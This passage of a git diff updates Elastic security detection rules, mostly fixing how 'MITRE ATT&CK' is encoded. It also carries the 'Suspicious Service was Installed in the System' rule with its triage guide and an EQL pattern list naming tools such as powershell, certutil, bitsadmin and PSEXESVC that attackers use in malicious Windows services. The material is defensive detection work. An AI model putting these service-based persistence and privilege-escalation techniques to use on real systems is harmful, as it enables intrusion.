drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON 
drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json index f7be99016ba..113d58062af 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json 
+++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON 
drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON 
drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\127.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\127.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json index e7bbd7966be..66865362c1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json 
+++ b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json
index cfac8d8201d..c48acd24f92 100644
--- a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json
index dd190891bc3..eb02af5eef6 100644
--- a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json
index c3637464448..fe16b016984 100644
--- a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json
index 0150a937dc6..78bb4e994db 100644
--- a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json
index b291b69ce71..b8efb3fa919 100644
--- a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json
index f55a5adca23..93aec9ace31 100644
--- a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json
index 758879b20d4..48548aec7e7 100644
--- a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json
index 4dc461744ab..5999ab52322 100644
--- a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json
index e57e347699a..31f1ef088dd 100644
--- a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json
index 61d08cc80f9..2d90bcd18ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json
index 6eb408e8e66..6b486babf17 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json
index ab40fe592ef..afb24ee3ee9 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json
index 199778fcc02..ab8d7832c16 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json
index ecc4df11709..d6bbe549c7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json
index a773ea353fc..1ac0b2b141c 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json
index 43206e1e49c..c04bdecdddc 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json
index 854658c2935..b5a7fd3a1f9 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json
index 4d77269fdd6..2bf4bed9b1f 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
